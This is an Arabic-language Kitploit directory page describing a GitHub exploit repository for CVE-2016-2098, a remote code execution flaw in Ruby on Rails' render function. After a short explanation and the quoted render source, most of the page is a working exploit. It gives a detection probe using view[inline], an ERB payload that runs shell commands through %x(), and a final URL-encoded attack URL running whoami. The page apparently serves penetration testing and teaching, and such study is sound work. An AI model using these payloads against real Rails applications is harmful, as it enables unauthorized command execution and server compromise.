Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2016-2098 — ثغرة تنفيذ كود عن بُعد في Ruby-on-Rails عند استخدام render على بيانات مقدمة من المستخدم. | Kitploit
أدوات/GitHubGitHub/j4k0m/cve-2016-2098
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubj4k0m/cve-2016-2098

CVE-2016-2098

ثغرة تنفيذ كود عن بُعد في Ruby-on-Rails عند استخدام render على بيانات مقدمة من المستخدم.

عرض المستودع
4منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2016-2098

ثغرة تنفيذ الأوامر عن بُعد في Ruby-on-Rails عند استخدام render على بيانات مقدمة من المستخدم.

شرح:

تأتي هذه المشكلة من استخدام دالة render على بيانات مقدمة من المستخدم.

عادةً ما تُستخدم دالة render لعرض صفحة من قالب، ولكن دالة render تسمح أيضًا للمطورين بعرض نص عادي (plaintext) وحتى كود مضمن (inline).

دالة render:

root@kitploit:~
# File actionpack/lib/abstract_controller/rendering.rb, line 23
def render(*args, &block)
  options = _normalize_render(*args, &block)
  rendered_body = render_to_body(options)
  if options[:html]
    _set_html_content_type
  else
    _set_rendered_content_type rendered_format
  end
  _set_vary_header
  self.response_body = rendered_body
end

مثال على الاستغلال:

الـ URL المستهدف:

root@kitploit:~
http://example.com/?view=test

الاستغلال:

root@kitploit:~
http://example.com/?view[inline]=OK

إذا ظهرت 'OK' في الكود المصدري، فإن تطبيق الويب معرض لثغرة CVE-2016-2098.

تنفيذ الأوامر عن بُعد

root@kitploit:~
<%= %x('[CMD]') %>

يمكننا استبدال CMD بالأمر الذي نريد تنفيذه.

root@kitploit:~
<%= %x('whoami') %>

بعد ترميز URL:

root@kitploit:~
%3C%25=%20%25x(whoami)%20%25%3E

النهائي:

root@kitploit:~
http://example.com/?view[inline]=%3C%25=%20%25x(whoami)%20%25%3E

الموارد:

  • https://guides.rubyonrails.org/layouts_and_rendering.html
تنزيل الأداة